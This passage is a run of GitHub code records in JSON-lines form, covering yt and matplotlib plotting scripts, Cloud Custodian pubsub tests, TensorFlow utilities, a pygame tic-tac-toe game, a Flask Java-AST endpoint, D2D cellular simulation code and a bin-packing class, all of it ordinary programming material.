1.5*c[i,j])/hy\r\n\r\n\treturn(dc)\r\n\r\nds = [yt.load(\"kh_mhd_Ma=0.803333333333At=0.0hdf5_chk_0000\"), \\\r\n\tyt.load(\"kh_mhd_Ma=0.803333333333At=0.0hdf5_chk_0001\")]\r\n\r\n# ds[0].print_stats()\r\n# ds[1].print_stats()\r\n\r\n# diffAnalysis(ds[0],ds[1],\"velx\",\"x-velocity\",\"vel$_x$ (cm$\\cdot$code length/code time)\",\"KH_velx_analysis\")\r\n# diffAnalysis(ds[0],ds[1],\"vely\",\"y-velocity\",\"vel$_y$ (cm$\\cdot$code length/code time)\",\"KH_vely_analysis\")\r\n\r\n# visualize(ds[0],\"vely\",\"y-velocity\",\"vel$_y$ (cm$\\cdot$code length/code time)\",\"KH_vely_visualization_0\")\r\n# visualize(ds[1],\"vely\",\"y-velocity\",\"vel$_y$ (cm$\\cdot$code length/code time)\",\"KH_vely_visualization_1\")\r\n\r\n# fieldAnalysis(ds[0],vorticity,\"Vorticity\",\"$\\\\vec{\\\\omega}$ (rad/second)\",\"KH_vort_log_analysis_0\")\r\n# fieldAnalysis(ds[1],vorticity,\"Vorticity\",\"$\\\\vec{\\\\omega}$ (rad/second)\",\"KH_vort_log_analysis_1\")\r\n\r\n# fieldAnalysis(ds[0],gradient,\"Gradient\",\"grad $\\\\vec{u}$\",\"KH_grad_log_analysis_0\")\r\n# fieldAnalysis(ds[1],gradient,\"Gradient\",\"grad $\\\\vec{u}$\",\"KH_grad_log_analysis_1\")\r\n\r\nfieldAnalysisQuiver(ds[0],gradient,\"Gradient\",\"grad $\\\\vec{u}$\",\"KH_grad_quiv_analysis_0\")\r\nfieldAnalysisQuiver(ds[1],gradient,\"Gradient\",\"grad $\\\\vec{u}$\",\"KH_grad_quiv_analysis_1\")","repo_name":"rjl09c/ysp2017","sub_path":"rtliu_grad_analysis.py","file_name":"rtliu_grad_analysis.py","file_ext":"py","file_size_in_byte":8809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"12662948888","text":"from gcp_common import BaseTest, event_data\n\nfrom pytest_terraform import terraform\n\n\n@terraform('pubsub_topic')\ndef test_pubsub_topic_query(test, pubsub_topic):\n topic_name = pubsub_topic['google_pubsub_topic.test_topic.id']\n\n session_factory = test.replay_flight_data('pubsub-topic-query')\n\n policy = test.load_policy(\n {'name': 'gcp-pubsub-topic-dryrun',\n 'resource': 'gcp.pubsub-topic'},\n session_factory=session_factory)\n\n resource = policy.resource_manager.get_resource(\n {'project_id': test.project_id, 'topic_id': topic_name}\n )\n test.assertEqual(resource['name'], topic_name)\n\n resources = policy.run()\n topic_names = [r['name'] for r in resources]\n assert topic_name in topic_names\n\n\n@terraform('pubsub_subscription')\ndef test_pubsub_subscription_query(test, pubsub_subscription):\n subscription_name = pubsub_subscription['google_pubsub_subscription.c7n.id']\n session_factory = test.replay_flight_data('pubsub-subscription-query')\n\n policy = test.load_policy(\n {'name': 'gcp-pubsub-subscription-dryrun',\n 'resource': 'gcp.pubsub-subscription',\n 'filters': [{'name': subscription_name}]},\n session_factory=session_factory)\n\n resources = policy.run()\n test.assertEqual(resources[0]['name'], subscription_name)\n\n\nclass PubSubSubscriptionTest(BaseTest):\n def test_pubsub_subscription_get(self):\n project_id = 'cloud-custodian'\n subscription_name = 'custodian'\n resource_name = 'projects/{}/subscriptions/{}'.format(project_id, subscription_name)\n session_factory = self.replay_flight_data(\n 'pubsub-subscription-get', project_id=project_id)\n\n policy = self.load_policy(\n {'name': 'gcp-pubsub-subscription-audit',\n 'resource': 'gcp.pubsub-subscription',\n 'mode': {\n 'type': 'gcp-audit',\n 'methods': ['google.pubsub.v1.Subscriber.CreateSubscription']\n }},\n session_factory=session_factory)\n\n exec_mode = policy.get_execution_mode()\n event = event_data('pubsub-subscription-create.json')\n resources = exec_mode.run(event, None)\n self.assertEqual(resources[0]['name'], resource_name)\n\n\nclass PubSubSnapshotTest(BaseTest):\n\n def test_pubsub_snapshot_query(self):\n project_id = 'cloud-custodian'\n pubsub_snapshot_name = 'projects/cloud-custodian/snapshots/custodian'\n session_factory = self.replay_flight_data(\n 'pubsub-snapshot-query', project_id=project_id)\n\n policy = self.load_policy(\n {'name': 'gcp-pubsub-snapshot-dryrun',\n 'resource': 'gcp.pubsub-snapshot'},\n session_factory=session_factory)\n\n pubsub_snapshot_resources = policy.run()\n self.assertEqual(pubsub_snapshot_resources[0]['name'], pubsub_snapshot_name)\n","repo_name":"gustcol/Canivete","sub_path":"cloud-custodian/tools/c7n_gcp/tests/test_pubsub.py","file_name":"test_pubsub.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"91"}
+{"seq_id":"41585102425","text":"import tensorflow as tf\nimport math\n\n\ndef save_model(root, checkpoint_prefix):\n root.save(file_prefix=checkpoint_prefix)\n\n\ndef tf_record_parser(record):\n keys_to_features = {\n \"image\": tf.FixedLenFeature((), tf.string, default_value=\"\"),\n \"height\": tf.FixedLenFeature((), tf.int64),\n \"width\": tf.FixedLenFeature((), tf.int64)\n }\n\n features = tf.parse_single_example(record, keys_to_features)\n\n height = tf.cast(features['height'], tf.int64)\n width = tf.cast(features['width'], tf.int64)\n image = tf.decode_raw(features['image'], tf.uint8)\n\n # reshape input and annotation images\n image = tf.reshape(image, (height, width, 3), name=\"image_reshape\")\n image = tf.image.random_flip_left_right(image)\n image = tf.image.resize_image_with_crop_or_pad(image, 128, 128)\n # image = tf.contrib.image.rotate([image], tf.random_uniform(\n # [1], maxval=math.pi / 10))[0]\n return tf.to_float(image)\n\n\ndef normalizer(image, dtype):\n # Not sure which one works better yet\n image = tf.cast(image, dtype=dtype) / 255.0 - 0.5\n # image = tf.cast(image, dtype=dtype) / 128.0 - 1.0\n # noise addition normalization\n image += tf.random_uniform(shape=tf.shape(image),\n minval=0., maxval=1./128., dtype=dtype)\n\n return image\n","repo_name":"settinghead/eager_gans","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"28756468211","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 30 12:19:44 2022\n\n@author: User\n\"\"\"\n\n\"\"\"\ntaking name from user and writing it to guest.txt file\n\"\"\"\nname = input(\"What's your name? \")\n\nfilename = 'guest.txt'\nwith open(filename,'w') as file:\n file.write(name)","repo_name":"RaisaAzad/Problem-Solving","sub_path":"writing_name.py","file_name":"writing_name.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"24662759045","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom odoo import fields, models\r\n\r\n\r\nclass Vehicle_Brand(models.Model):\r\n _name = 'vehicletest_brand'\r\n _description = 'brand'\r\n\r\n name = fields.Char(\r\n string='Brand Name',\r\n required=True,\r\n help=\"Fill brand name\"\r\n )\r\n\r\n description = fields.Text(\r\n string='Description',\r\n )\r\n\r\n active = fields.Boolean(\r\n string='Active'\r\n )\r\n \r\n \r\n\r\n ","repo_name":"hmzhmrgh/test","sub_path":"vehicletest/models/vehicle_brand.py","file_name":"vehicle_brand.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"8719198987","text":"import pygame\nfrom engine import Jeu\n\nWIDTH = 500\nHEIGHT = 500\nBLANC = (255,255,255)\nNOIR = (0,0,0)\n\npygame.init()\n\njeu = Jeu()\n\nscreen = pygame.display.set_mode((WIDTH,HEIGHT))\npygame.display.set_caption(\"morpion\")\n\nbg = pygame.Surface((WIDTH,HEIGHT))\nbg.fill(BLANC)\npygame.draw.line(bg, NOIR, (0,HEIGHT/3), (WIDTH,HEIGHT/3), 3)\npygame.draw.line(bg, NOIR, (0,2*HEIGHT/3), (WIDTH,2*HEIGHT/3), 3)\npygame.draw.line(bg, NOIR, (WIDTH/3,0), (WIDTH/3,HEIGHT), 3)\npygame.draw.line(bg, NOIR, (2*WIDTH/3,0), (2*WIDTH/3,HEIGHT), 3)\n\nw = WIDTH/3-4\nh = HEIGHT/3-4\ncroix = pygame.Surface((w,h))\ncroix.fill(BLANC)\npygame.draw.line(croix, NOIR, (w/4, h/4), (3*w/4, 3*h/4), 3)\npygame.draw.line(croix, NOIR, (w/4, 3*h/4), (3*w/4, h/4), 3)\n\ncercle = pygame.Surface((w,h))\ncercle.fill(BLANC)\npygame.draw.circle(cercle, NOIR, (int(w//2), int(h//2)), int(3*w//8), 3)\n\nclock = pygame.time.Clock()\n\ncontinuer = True\nwhile continuer:\n\n for e in pygame.event.get():\n if e.type == pygame.QUIT:\n continuer = False\n elif e.type == pygame.MOUSEBUTTONUP and not jeu.fin[0]:\n position = e.pos\n colonne = int(position[0]//(WIDTH/3))\n ligne = int(position[1]//(HEIGHT/3))\n jeu.maj(colonne, ligne)\n screen.blit(bg, (0,0))\n for i in range(len(jeu.plateau)):\n for j in range(len(jeu.plateau[i])):\n if jeu.plateau[i][j]==1:\n screen.blit(croix, (j*WIDTH/3+2, i*HEIGHT/3+2))\n elif jeu.plateau[i][j]==2:\n screen.blit(cercle, (j*WIDTH/3+2, i*HEIGHT/3+2))\n\n if jeu.fin[0]:\n pygame.display.set_caption(\"Victoire \"+str(jeu.fin[1]))\n\n pygame.display.flip()\n\n clock.tick(30)\n\npygame.quit()\nquit()\n","repo_name":"guillaumecresp/exp_hub","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"70116223345","text":"#written by Jared Arzate\nimport sys\nimport os\nimport defs\nsys.path.append(defs.func_dir)\nsys.path.append(defs.in_dir)\n\nimport generic_functions as gf\nimport umame_functions as uf\nimport numpy as np\nfrom pathlib import Path\n\n\ndef main():\n print(f\"using\",defs.out_dir,\"as output path.\")\n print(f\"and\",defs.in_dir,\"as input path.\")\n\n path,data_dir,output_dir,output_file = gf.get_input()\n\n ####\n print(\"enter number of temps\")\n num_temps = int(input())\n print(\"enter number of iterations\")\n num_iters = int(input())\n\n print(\"\\nenter the column indeces to extract.\")\n print(\"as a tuple: \")\n in_str=input()\n indeces = tuple((int(in_str[1]), int(in_str[3]), int(in_str[5])) )\n\n label = uf.parse_filename_umame()\n ##### cat all files\n master_x = np.zeros((num_temps,num_iters))\n master_y = np.zeros((num_temps,num_iters))\n master_z = np.zeros((num_temps,num_iters))\n print(\"parsing file contents...\")\n iter_val = 0 #will be incremented to access all files\n temp_val = 0 #will be incremented to access all files\n for i in range(num_temps):\n temp_to_append = str(temp_val)\n while len(temp_to_append) < 7: temp_to_append = '0' + temp_to_append\n\n for j in range(num_iters):\n #assumes your inputting the file name correctly...\n iter_to_append = str(iter_val)\n while len(iter_to_append) < 5: iter_to_append = '0' + iter_to_append\n file_name = label + temp_to_append + \"_\" + iter_to_append + \".txt\" \n print(file_name)\n file_path = path / file_name\n master_x[i,j] = np.average(np.genfromtxt(file_path,skip_header=1,usecols=indeces[0]))\n master_y[i,j] = np.average(np.genfromtxt(file_path,skip_header=1,usecols=indeces[1]))\n master_z[i,j] = np.average(np.genfromtxt(file_path,skip_header=1,usecols=indeces[2]))\n #next file, if exists\n iter_val += 1 \n temp_val += 1\n iter_val = 0\n\n x = np.transpose(gf.order_data(master_x.flatten(),num_temps,num_iters))\n y = np.transpose(gf.order_data(master_y.flatten(),num_temps,num_iters))\n z = np.transpose(gf.order_data(master_z.flatten(),num_temps,num_iters)) \n\n gf.write_out(output_dir, output_file, x,y,z,indeces)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JaredArz/mx3_and_uMaME_process","sub_path":"umame_cat_main.py","file_name":"umame_cat_main.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"12600551480","text":"\"\"\"\nMatplotlib 3D 使用\n 1. 创建3D坐标轴\n 2. 绘制散点图\n 3. 绘制3d曲线\n 4. 绘制3d曲面\n 5. 绘制等高线\n 6. 随机散点图\n 7. 随机散点图\n 8. 绘制3D表面图\n 9. 空间文字\n 10.3D柱状图\n\"\"\"\n\n\n# 创建3d坐标轴\ndef create_axes():\n from matplotlib import pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n fig = plt.figure()\n ax1 = plt.axes(projection='3d')\n ax2 = Axes3D(fig) # 效果和上一行相同\n # ax = fig.add_subplot(111,projection='3d') # 使用这种方式可以创建多个3d图形\n plt.show()\n\n\n# 绘制散点图\ndef points():\n import numpy as np\n from matplotlib import pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n zd = 13 * np.random.random(100)\n xd = 5 * np.sin(zd)\n yd = 5 * np.cos(zd)\n ax1 = plt.axes(projection='3d')\n ax1.scatter3D(xd, yd, zd, cmap='Blues')\n plt.show()\n\n\n# 绘制3d曲线\ndef curvilinear():\n import numpy as np\n from matplotlib import pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n z = np.linspace(0, 13, 1000)\n x = 5 * np.sin(z)\n y = 5 * np.cos(z)\n ax1 = plt.axes(projection='3d')\n ax1.plot3D(x, y, z, 'gray')\n plt.show()\n\n\n# 绘制3d曲面\ndef curved_surface():\n import numpy as np\n from matplotlib import pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n\n fig = plt.figure() # 定义新的三维坐标轴\n ax3 = plt.axes(projection='3d')\n\n # 定义三维数据\n z = np.linspace(0, 13, 1000)\n x = 5 * np.sin(z)\n y = 5 * np.cos(z)\n xx = np.arange(-10, 10, 100)\n yy = np.arange(-10, 10, 100)\n X, Y = np.meshgrid(x, y)\n Z = np.sin(X) + np.cos(Y)\n # 作图\n # rstride, cstride 为作图的步长,数值越小图片越清晰,需要的资源越大\n ax3.plot_surface(X, Y, Z, rstride=50, cstride=50, cmap='rainbow')\n # ax3.contour(X,Y,Z, zdim='z',offset=-2,cmap='rainbow') # 等高线图,要设置offset,为Z的最小值\n plt.show()\n\n\n# 绘制等高线\ndef contour():\n import numpy as np\n from matplotlib import pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n xx = np.arange(-5, 5, 0.1)\n yy = np.arange(-5, 5, 0.1)\n X, Y = np.meshgrid(xx, yy)\n Z = np.sin(np.sqrt(X ** 2 + Y ** 2))\n # 作图\n ax4 = plt.axes(projection='3d')\n ax4.plot_surface(X, Y, Z, alpha=0.3, cmap='winter') # 生成表面, alpha 用于控制透明度\n ax4.contour(X, Y, Z, zdir='z', offset=-3, cmap=\"rainbow\") # 生成z方向投影,投到x-y平面\n ax4.contour(X, Y, Z, zdir='x', offset=-6, cmap=\"rainbow\") # 生成x方向投影,投到y-z平面\n ax4.contour(X, Y, Z, zdir='y', offset=6, cmap=\"rainbow\") # 生成y方向投影,投到x-z平面\n # ax4.contourf(X,Y,Z,zdir='y', offset=6,cmap=\"rainbow\") #生成y方向投影填充,投到x-z平面,contourf()函数\n # 设定显示范围\n ax4.set_xlabel('X')\n ax4.set_xlim(-6, 4) # 拉开坐标轴范围显示投影\n ax4.set_ylabel('Y')\n ax4.set_ylim(-4, 6)\n ax4.set_zlabel('Z')\n ax4.set_zlim(-3, 3)\n plt.show()\n\n\n# 随机散点图\ndef random_point():\n import numpy as np\n from matplotlib import pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\n #定义坐标轴\n fig4 = plt.figure()\n ax4 = plt.axes(projection='3d')\n #生成三维数据\n xx = np.random.random(20)*10-5 #取100个随机数,范围在5~5之间\n yy = np.random.random(20)*10-5\n X, Y = np.meshgrid(xx, yy)\n Z = np.sin(np.sqrt(X**2+Y**2))\n # 作图\n ax4.scatter(X,Y,Z,alpha=0.3,c=np.random.random(400),s=np.random.randint(10,20, size=(20, 40))) #生成散点.利用c控制颜色序列,s控制大小\n # 设定显示范围\n plt.show()\n\n\n# 绘制3D表面图\ndef surface():\n from mpl_toolkits.mplot3d import Axes3D\n import matplotlib.pyplot as plt\n import numpy as np\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n\n u = np.linspace(0, 2 * np.pi, 100)\n v = np.linspace(0, np.pi, 100)\n x = 10 * np.outer(np.cos(u), np.sin(v))\n y = 10 * np.outer(np.sin(u), np.sin(v))\n z = 10 * np.outer(np.ones(np.size(u)), np.cos(v))\n\n ax.plot_surface(x, y, z, color='b')\n plt.show()\n\n\n# 空间文字\ndef text_3d():\n from mpl_toolkits.mplot3d import Axes3D\n import matplotlib.pyplot as plt\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n zdirs = (None, 'x', 'y', 'z', (1, 1, 0), (1, 1, 1))\n xs = (1, 4, 4, 9, 4, 1)\n ys = (2, 5, 8, 10, 1, 2)\n zs = (10, 3, 8, 9, 1, 8)\n for zdir, x, y, z in zip(zdirs, xs, ys, zs):\n label = '(%d, %d, %d), dir=%s' % (x, y, z, zdir)\n ax.text(x, y, z, label, zdir)\n ax.text(9, 0, 0, \"red\", color='red')\n ax.text2D(0.05, 0.95, \"2D Text\", transform=ax.transAxes)\n ax.set_xlim(0, 10)\n ax.set_ylim(0, 10)\n ax.set_zlim(0, 10)\n ax.set_xlabel('X axis')\n ax.set_ylabel('Y axis')\n ax.set_zlabel('Z axis')\n plt.show()\n\n\n# 3d 柱状图\ndef bar_3d():\n from mpl_toolkits.mplot3d import Axes3D\n import matplotlib.pyplot as plt\n import numpy as np\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n for c, z in zip(['r', 'g', 'b', 'y'], [30, 20, 10, 0]):\n xs = np.arange(20)\n ys = np.random.rand(20)\n # You can provide either a single color or an array. To demonstrate this,\n # the first bar of each set will be colored cyan.\n cs = [c] * len(xs)\n cs[0] = 'c'\n ax.bar(xs, ys, zs=z, zdir='y', color=cs, alpha=0.8)\n ax.set_xlabel('X')\n ax.set_ylabel('Y')\n ax.set_zlabel('Z')\n plt.show()\n\n\n# create_axes()\n# points()\n# curvilinear()\n# curved_surface()\n# contour()\n# random_point()\n# surface()\n# text_3d()\nbar_3d()\n","repo_name":"StarkTan/Python","sub_path":"Matplotlib/example/basic_use_3d.py","file_name":"basic_use_3d.py","file_ext":"py","file_size_in_byte":5712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"28956671467","text":"import sys\nimport os\n\nsys.path.append(os.path.abspath(\".\"))\nsys.dont_write_bytecode = True\n\n__author__ = \"COSAL\"\n\nfrom mos.search.tree import java_tree\n\nfrom flask import Flask, request, jsonify\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n return \"Hello World\"\n\n\n@app.route(\"/java/ast\", methods=[\"POST\"])\ndef get_java_ast():\n java_code = request.form[\"code\"]\n ret_obj = {}\n try:\n code_ast = java_tree.parse_content(java_code)\n ret_obj = {\n \"status\": 200,\n \"ast\": code_ast\n }\n except Exception as e:\n print(e)\n ret_obj = {\n \"status\": 500,\n \"error_msg\": e.message\n }\n return jsonify(ret_obj)\n\n\nif __name__ == \"__main__\":\n app.run(port=5000)\n","repo_name":"DynamicCodeSearch/COSAL","sub_path":"code/src/main/python/mos/api/java.py","file_name":"java.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"}
+{"seq_id":"4874839207","text":"import sys\nimport numpy as np\nimport random as rand\nfrom numpy.random import uniform, exponential, normal\nimport math\nimport time\nimport matplotlib.pyplot as plt\n\nfrom core.config import Cell_Model, D2D, Cellular_UE, Channel\n\n\ndef initial_user_locations(cell):\n\n d_cell_users = []\n d_d2d_users = [[[0, 0], [0, 0]] for _ in range(cell.d2d_pairs)]\n \n '''Initially we assign the locations of all the cellular users \n as well as the d2d sender.'''\n radius_list = list(uniform(0, cell.cell_radius, \n (cell.d2d_pairs + cell.cell_users)))\n theta_list = list(uniform(0, 360, (cell.d2d_pairs + cell.cell_users)))\n for i in range(cell.d2d_pairs + cell.cell_users):\n d_cell_users.append([radius_list[i], theta_list[i]])\n #Shuffling all the users so that the d2d users can be selected randomly\n rand.shuffle(d_cell_users)\n for i in range(cell.d2d_pairs):\n d_d2d_users[i][0][0] = d_cell_users[0][0]\n d_d2d_users[i][0][1] = d_cell_users[0][1]\n d_d2d_users[i][1][0] = uniform(0, cell.d2d_radius)\n d_d2d_users[i][1][1] = uniform(0, 360)\n d_cell_users.remove(d_cell_users[0])\n\n # Initializing Shadow fading for both cellular and d2d\n shadow_fading_d2d = normal(0, 12, cell.d2d_pairs)\n shadow_fading_cell = normal(0, 10, cell.cell_users)\n \n for i in range(cell.cell_users):\n ue = Cellular_UE(i+1, d_cell_users[i], cell.cell_radius, \n cell.del_cell_rad, cell.del_theta, shadow_fading_cell[i])\n #ue.shadow_fading = shadow_fading_cell[i] #Assigning S.F. to UEs\n cell.cellular_list.append(ue)\n \n for i in range(cell.d2d_pairs):\n d2d = D2D(i+1, d_d2d_users[i][0], d_d2d_users[i][1], \n cell.cell_radius, cell.d2d_radius, cell.del_cell_rad, \n cell.del_d2d_rad, cell.del_theta, shadow_fading_d2d[i])\n #d2d.shadow_fading = shadow_fading_d2d[i] #Assigning S.F. to D2Ds\n cell.d2d_list.append(d2d)\n \n #print(d_cell_users)\n #print(d_d2d_users)\n\n return cell, d_cell_users, d_d2d_users, shadow_fading_cell, shadow_fading_d2d\n\n\ndef init_channels(cell):\n\n #Initialize the channels\n for i in range(cell.channels):\n ch = Channel(i+1)\n if (i+1) <= cell.cell_users:\n ch.cell = ch.id\n cell.channel_list.append(ch)\n\n return cell\n\ndef allocate(cell):\n i = 0\n for ch in cell.channel_list:\n ch.d2d = ch.id\n i += 1\n while i < len(cell.d2d_list):\n cell.unallocated_d2d.append(i+1)\n i += 1\n\n return cell\n\ndef copy_initial_data(cell, d_cell_users, d_d2d_users, sf_cell, sf_d2d):\n\n for location, value in enumerate(d_cell_users):\n cellular = Cellular_UE(location + 1, value, cell.cell_radius, \n cell.del_cell_rad, cell.del_theta, \n sf_cell[location])\n cell.cellular_list.append(cellular)\n\n for location, value in enumerate(d_d2d_users):\n d2d = D2D(location + 1, value[0], value[1], cell.cell_radius, \n cell.d2d_radius, cell.del_cell_rad, cell.del_d2d_rad, \n cell.del_theta, sf_d2d[location])\n cell.d2d_list.append(d2d)\n\n return cell\n \ndef swap(cell, shared_channels, dedicated_channels, iteration):\n\n if iteration is not 1:\n min_throughput = shared_channels[0].throughput \n shared_location = 0\n for i in range(len(shared_channels)):\n if min_throughput >= shared_channels[i].throughput:\n shared_location = i\n min_throughput = shared_channels[i].throughput\n\n min_throughput = dedicated_channels[0].throughput \n dedicated_location = 0\n for i in range(len(dedicated_channels)):\n if min_throughput >= dedicated_channels[i].throughput:\n dedicated_location = i\n min_throughput = dedicated_channels[i].throughput\n\n cell.unallocated_d2d.append(shared_channels[shared_location].d2d)\n print('D2D {} of Shared Channel {} Unallocated'.format(shared_channels[shared_location].d2d, \n shared_channels[shared_location].id))\n\n shared_channels[shared_location].d2d = dedicated_channels[dedicated_location].d2d \n shared_channels[shared_location].reward = None\n shared_channels[shared_location].freshness = 0 #Initialize freshness to 0\n print('D2D {} of Dedicated Channel {} to Shared Channel {}'.format(dedicated_channels[dedicated_location].d2d, \n dedicated_channels[dedicated_location].id, \n shared_channels[shared_location].id))\n\n dedicated_channels[dedicated_location].d2d = cell.unallocated_d2d.popleft()\n print('Unallocated D2D {} to Dedicated Channel {}'.format(dedicated_channels[dedicated_location].d2d, \n dedicated_channels[dedicated_location].id))\n\n\n return cell, shared_channels, dedicated_channels\n\n\ndef swap_new(cell, shared_channels, dedicated_channels, iteration):\n\n reward_thres = 500\n\n if iteration is not 1:\n min_reward = shared_channels[0].reward\n shared_location = None\n for i in range(len(shared_channels)):\n print('Reward for channel {} is {}'.format(shared_channels[i].id, \n shared_channels[i].reward))\n if int(shared_channels[i].reward) < 500:\n if min_reward >= shared_channels[i].reward:\n shared_location = i\n min_reward = shared_channels[i].reward\n\n min_throughput = dedicated_channels[0].throughput \n dedicated_location = 0\n for i in range(len(dedicated_channels)):\n if min_throughput >= dedicated_channels[i].throughput:\n dedicated_location = i\n min_throughput = dedicated_channels[i].throughput\n\n if shared_location is not None:\n cell.unallocated_d2d.append(shared_channels[shared_location].d2d)\n print('D2D {} of Shared Channel {} Unallocated'.format(shared_channels[shared_location].d2d, \n shared_channels[shared_location].id))\n\n shared_channels[shared_location].d2d = dedicated_channels[dedicated_location].d2d \n shared_channels[shared_location].reward = None\n shared_channels[shared_location].freshness = 0 #Initialize freshness to 0\n print('D2D {} of Dedicated Channel {} to Shared Channel {}'.format(dedicated_channels[dedicated_location].d2d, \n dedicated_channels[dedicated_location].id, \n shared_channels[shared_location].id))\n\n dedicated_channels[dedicated_location].d2d = cell.unallocated_d2d.popleft()\n print('Unallocated D2D {} to Dedicated Channel {}'.format(dedicated_channels[dedicated_location].d2d, \n dedicated_channels[dedicated_location].id))\n\n cell.channel_list[shared_channels[shared_location].id - 1] = shared_channels[shared_location]\n\n else:\n\n cell.unallocated_d2d.append(dedicated_channels[dedicated_location].d2d)\n print('D2D {} of Dedicated Channel {} Unallocated'.format(dedicated_channels[dedicated_location].d2d, \n dedicated_channels[dedicated_location].id))\n\n dedicated_channels[dedicated_location].d2d = cell.unallocated_d2d.popleft()\n print('Unallocated D2D {} to Dedicated Channel {}'.format(dedicated_channels[dedicated_location].d2d, \n dedicated_channels[dedicated_location].id))\n\n\n return cell, shared_channels, dedicated_channels","repo_name":"AnirbanBanik1998/SPARQ","sub_path":"SPARQ/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7531,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"}
+{"seq_id":"4817693006","text":"idade = sexo = contadorHomens = contadorIdade = contadorMulheres = 0\n\nwhile True:\n idade = int(input('Digite sua idade por favor: '))\n if idade > 18:\n contadorIdade += 1\n\n sexo = input('Certo... Agora me informe seu sexo biológico: ').strip().upper()[0]\n if sexo == \"M\":\n contadorHomens += 1\n if sexo == \"F\" and idade < 20:\n contadorMulheres += 1\n\n continuar = input('\\nDeseja continuar cadastrando? [S/N]: \\n').strip().upper()[0]\n if continuar == \"N\":\n break \n\nprint(f\"\\nForam cadastrados {contadorHomens} homens.\\n{contadorIdade} pessoas tem mais de 18 anos.\\n{contadorMulheres} mulheres tem menos de 20 anos.\")","repo_name":"antonio00/blue-vscode","sub_path":"MODULO 01/AULA 12/rascunhos.py","file_name":"rascunhos.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"18404027506","text":"\r\nimport random\r\n\r\n\r\nclass BinPackerNode:\r\n def __init__(self, x=0, y=0, width=0,height=0, data=None, left=None,right=None):\r\n self.x = x\r\n self.y = y\r\n self.width = width\r\n self.height = height\r\n self.data = data\r\n self.left = left\r\n self.right = right\r\n\r\n def split(self, data, width, height):\r\n self.data = data\r\n self.left = BinPackerNode(self.x,self.y+height, self.width, self.height-height)\r\n self.right = BinPackerNode(self.x+width,self.y, self.width-width, height)\r\n return self\r\n \r\n @staticmethod\r\n def find(node, width, height):\r\n if node.data:\r\n return BinPackerNode.find(node.right, width, height) or BinPackerNode.find(node.left, width, height)\r\n elif width <= node.width and height <= node.height:\r\n return node\r\n return None\r\n\r\n\r\nclass BinPacker:\r\n def __init__(self, width, height):\r\n self.root = BinPackerNode(0,0,width,height)\r\n \r\n cbsort = {\r\n \"w\": (lambda a,b: b[\"width\"] - a[\"width\"]),\r\n \"h\": (lambda a,b: b[\"height\"] - a[\"height\"]),\r\n \"a\": (lambda a,b: b[\"width\"]*b[\"height\"] - a[\"width\"]*a[\"height\"]),\r\n \"max\": (lambda a,b: max(b[\"width\"], b[\"height\"]) - max(a[\"width\"], a[\"height\"])),\r\n \"min\": (lambda a,b: min(b[\"width\"], b[\"height\"]) - min(a[\"width\"], a[\"height\"])),\r\n \"random\": (lambda a,b: random.random() - 0.5),\r\n \"height\": (lambda a,b: BinPacker.msort(a, b, ['h','w'])),\r\n \"width\": (lambda a,b: BinPacker.msort(a, b, ['w','h'])),\r\n \"area\": (lambda a,b: BinPacker.msort(a, b, ['a','h','w'])),\r\n \"maxside\": (lambda a,b: BinPacker.msort(a, b, ['max','min','h','w'])),\r\n }\r\n \r\n @staticmethod\r\n def msort(a, b, criteria):\r\n diff = 0\r\n for n in range(len(criteria)):\r\n diff = BinPacker.cbsort[criteria[n]](a,b)\r\n if diff != 0:\r\n break\r\n return diff\r\n \r\n @staticmethod\r\n def swap(a,i,j):\r\n t = a[i]\r\n a[i] = a[j]\r\n a[j] = t\r\n\r\n @staticmethod\r\n def sort(arr, criteria = ['height']):\r\n for i in range(0, len(arr)-1):\r\n for j in range(i+1, len(arr)):\r\n if BinPacker.msort(arr[i], arr[j], criteria) > 0:\r\n BinPacker.swap(arr,i,j)\r\n\r\n def fit(self, blocks_src, criteria = ['height']):\r\n res = []\r\n blocks = []\r\n \r\n for i in range(len(blocks_src)):\r\n blocks.append(blocks_src[i])\r\n\r\n BinPacker.sort(blocks, criteria)\r\n\r\n for i in range(len(blocks)):\r\n block = blocks[i]\r\n w = block[\"width\"]\r\n h = block[\"height\"]\r\n node = BinPackerNode.find(self.root, w,h)\r\n if not node:\r\n continue\r\n if not node.split(block[\"data\"] if \"data\" in block else \"empty\", w,h):\r\n continue\r\n node.width = w\r\n node.height = h\r\n res.append(node)\r\n return 